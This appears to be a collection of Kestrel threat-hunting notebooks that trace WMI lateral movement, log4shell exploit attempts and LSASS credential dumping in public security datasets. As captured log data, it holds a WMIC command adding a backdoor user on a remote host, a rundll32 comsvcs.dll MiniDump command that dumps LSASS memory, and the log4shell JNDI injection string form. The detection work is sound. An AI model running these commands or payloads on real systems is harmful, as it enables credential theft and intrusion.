# Lateral movement via WMI

Lateral movement via WMI (Source : huntbooks/Lateral Movement via WMI.ipynb)

https://attack.mitre.org/techniques/T1047/

Example Data Source
https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200914080546.html

Let's start by looking for any WMIC activity:

In [8]:
wmic_procs = GET process
             FROM https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip
             WHERE [process:command_line LIKE '%WMIC%']

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*
wmic_procs,process,1,153,154,270,278,4,2,157,4,18,154,154


In [2]:
DISP wmic_procs ATTR created, command_line, pid, x_unique_id

created,command_line,pid,x_unique_id
2020-09-14T12:06:01.826Z,"""C:\windows\System32\Wbem\WMIC.exe"" /node:WORKSTATION6 process call create ""net user /add backdoor paw0rd1""",9428,{2d351099-5ca9-5f5f-2f04-000000000400}


The command line alone gives this one away: WMIC.exe is used to create a new process on WORKSTATION6. Let's try to find those processes by looking for the WMI Provider Host (WMIPrvSE.exe):

In [3]:
wmiprvse_procs = GET process
                 WHERE [process:command_line LIKE '%wmiprvse%']

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*
wmiprvse_procs,process,2,130,132,228,241,0,0,138,8,15,132,132


In [4]:
DISP wmiprvse_procs ATTR created, command_line, pid, x_unique_id

created,command_line,pid,x_unique_id
2020-09-14T12:06:02.209Z,C:\windows\system32\wbem\wmiprvse.exe -secured -Embedding,3952,{83d0c8c3-5caa-5f5f-f002-000000000400}
2020-09-14T12:06:08.432Z,C:\windows\system32\wbem\wmiprvse.exe -secured -Embedding,7296,{2d351099-5cb0-5f5f-3804-000000000400}


So it looks like there's 2 instances, pids 3952 and 7296. They both occur after the WMIC.exe command we saw; the first timestamp is less than a second later. We can now try to find the processes created by these 2 instances:

In [5]:
spawned = FIND process CREATED BY wmiprvse_procs

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-oca-asset*,x-oca-event*
spawned,process,1,23,153,250,282,0,0,163,11,15,153,153


In [9]:
DISP spawned ATTR created, command_line, pid, x_unique_id, parent_ref.x_unique_id

created,command_line,pid,x_unique_id,parent_ref.x_unique_id
2020-09-14T12:06:02.316Z,net user /add backdoor paw0rd1,7768,{83d0c8c3-5caa-5f5f-f102-000000000400},{83d0c8c3-5caa-5f5f-f002-000000000400}


We only found 1, but it matches the original WMIC.exe command line we found initially.

# log4shell

(Source: https://github.com/opencybersecurityalliance/kestrel-huntbook/blob/main/huntbooks/log4shell%20Detection.ipynb)

References
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Search payloads (artifact:payload_bin, which could be base64 logs, depending on the data source) for obfuscated log4shell exploit attempts.


Exploit attempts involve the attacker inserting special strings into an application (e.g. specially crafter user agent string in an HTTP request) that she knows will be logged. If that application uses a vulnerable version of log4j, it will attempt to interpret these special strings, leading to the RCE.

The strings are of the form ${jndi:ldap://example.com/path}. Other schemes besides ldap, such as dns, rmi, etc. can be used as well. The strings can be obfuscated with other "property substition" constructs, like ${lower:J} which, when evaluated, returns j.

The detection logic here attempts to pick out strings like ${...} and parse/interpret them to deobfuscate. The parser will either give up or return the deobfuscated JNDI string, so you can inspect the target (which might help reduce false positives, or help you collect attack server URIs).


Step 1: collect some data
This notebook uses a STIX bundle with real exploit data, hosted on github. You can replace that URL with your own stix-shifter data source config to search any supported data source.

The regular expression used in the STIX pattern, .* is perhaps overly broad. You should tailor it to your environment.

In [13]:
logs = GET artifact FROM https://raw.githubusercontent.com/opencybersecurityalliance/kestrel-analytics/release/testdata/log4shell_bundle.json
    WHERE [artifact:payload_bin MATCHES '.*']

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,mac-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-ibm-finding*,x-oca-asset*,x-oca-event*,x-qradar*
logs,artifact,10,10,0,0,0,23,10,10,0,0,0,10,0,10,10


Step 2: apply detection logic
Now run the "analytic" to try and pick out exploit attempts. It will add an exploit attribute to each entity in the logs variable. If an exploit attempt is found in that payload, it will be deobfuscated and added to the entity. It will also add the base64-decoded payload as original.

In [ ]:
APPLY python://log4shell-deobfuscation-and-detection ON logs

Step 3: filter

Now filter the enriched logs variable so that only entities with non-NULL exploit attributes remain. The display those for manual inspection.

In [15]:
susp = GET artifact FROM logs WHERE [artifact:exploit LIKE '%']
DISP susp ATTR id, first_observed, exploit, original

id,"""first_observed""","""exploit""","""original"""
artifact--002e0ef8-9229-5d9e-96c9-c24f115bbd90,first_observed,exploit,original
artifact--0114f035-ee43-5229-af40-da1ee6bc7fd6,first_observed,exploit,original
artifact--01897fee-d5e3-5a88-a0d2-01b2b9d3092a,first_observed,exploit,original
artifact--01ad1e46-2209-595a-8a4d-ab72bfc044af,first_observed,exploit,original
artifact--04c22bd9-55c2-57e9-8c1b-bd07cd4bfa7a,first_observed,exploit,original
artifact--066f82c2-047f-5544-8562-d1a4953c4d05,first_observed,exploit,original
artifact--09e2917a-b0b8-5c96-9156-7594655e6e42,first_observed,exploit,original
artifact--0b80c5fa-92e9-5cf8-98c6-c442edc4c9ae,first_observed,exploit,original
artifact--0c0924c9-cb16-5a04-b5f4-ae1dccdff298,first_observed,exploit,original
artifact--0c363669-2915-5c8e-a62a-b79f7ab255f3,first_observed,exploit,original


Alternative searches
You may want to search for more specific STIX Cyber Observables (SCOs) like url or network-traffic (which may use the http-request-ext extension, potentially giving you visibility into HTTP request headers like User-Agent.

For URLs, you could try a pattern like [url:value MATCHES '\$\{'] but URL encoding would cause it to miss.

In [16]:
urls = GET url
       FROM https://raw.githubusercontent.com/opencybersecurityalliance/kestrel-analytics/release/testdata/log4shell_bundle.json
       WHERE [url:value MATCHES '.*']

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,mac-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-ibm-finding*,x-oca-asset*,x-oca-event*,x-qradar*
urls,url,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0


# Lsass Memory Dump via Comsvcs.dll

https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201018195009.html

https://attack.mitre.org/techniques/T1003/001

Attacker sometimes use built-in tools in Windows to dump credential materials from the memory of the Local Security Authority Subsystem Service (LSASS). This hunt will look at one such technique, using the MiniDump exported function from Comsvcs.dll.

The dataset used here for demonstration is available from the SecurityDatasets.com page linked above. The Simulation Metadata section of that page shows the tool type as "manual" meaning the simulated adversary manually ran this command from a PowerShell session.

We'll start by searching for the use of rundll32.exe to load comsvcs.dll and run the MiniDump function therein:

In [18]:
procs = GET process
        FROM https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_lsass_memory_dump_comsvcs.zip
        WHERE binary_ref.name = 'rundll32.exe'
              AND command_line LIKE '%comsvcs.dll% MiniDump%'

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,mac-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-ibm-finding*,x-oca-asset*,x-oca-event*,x-qradar*
procs,process,1,33,34,38,67,0,0,0,36,3,0,0,34,34,0


In [19]:
DISP procs ATTR binary_ref.name, command_line, pid

binary_ref.name,command_line,pid
rundll32.exe,"""C:\Windows\System32\rundll32.exe"" C:\windows\System32\comsvcs.dll MiniDump 756 C:\Users\wardog\AppData\Local\Temp\lsass-comsvcs.dmp full",4824


We found 1 instance; whether a given instance is malicious or not could depend on the related entities: the process that created this process, the associated user-account, etc. Let's look at the parent process:

In [20]:
parents = FIND process CREATED procs

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,mac-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-ibm-finding*,x-oca-asset*,x-oca-event*,x-qradar*
parents,process,1,28,60,66,95,0,0,0,63,4,24,0,60,60,0


In [21]:
DISP parents ATTR binary_ref.name, command_line, parent_ref.pid

binary_ref.name,command_line,parent_ref.pid
powershell.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,None


It's PowerShell, which is a standard Windows shell. It's also a popular tool for attackers, however. The dataset we're using doesn't show anything beyond this, but if you re-run this hunt against a live data source you could continue following the trail here by FINDing what process created the powershell, etc.

Knowing the user will help round out the picture for the incident report.

In [22]:
users = FIND user-account OWNED procs

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,mac-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-ibm-finding*,x-oca-asset*,x-oca-event*,x-qradar*
users,user-account,1,4,61,68,97,0,0,0,66,4,24,0,61,61,0


In [23]:
DISP users

user_id,id
WORKSTATION5\wardog,user-account--c8b6cbe8-e16c-5b03-948a-085d1333e43e


We can also retrieve the machine names where this took place:

In [24]:
hosts = FIND x-oca-asset LINKED procs

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),artifact*,directory*,file*,ipv4-addr*,mac-addr*,network-traffic*,process*,user-account*,windows-registry-key*,x-ibm-finding*,x-oca-asset*,x-oca-event*,x-qradar*
hosts,x-oca-asset,1,61,61,68,97,0,0,0,66,5,24,0,60,61,0


In [25]:
DISP hosts

hostname,id
WORKSTATION5,x-oca-asset--40bf1119-f018-56a0-a6a5-9bfeab2bc1df
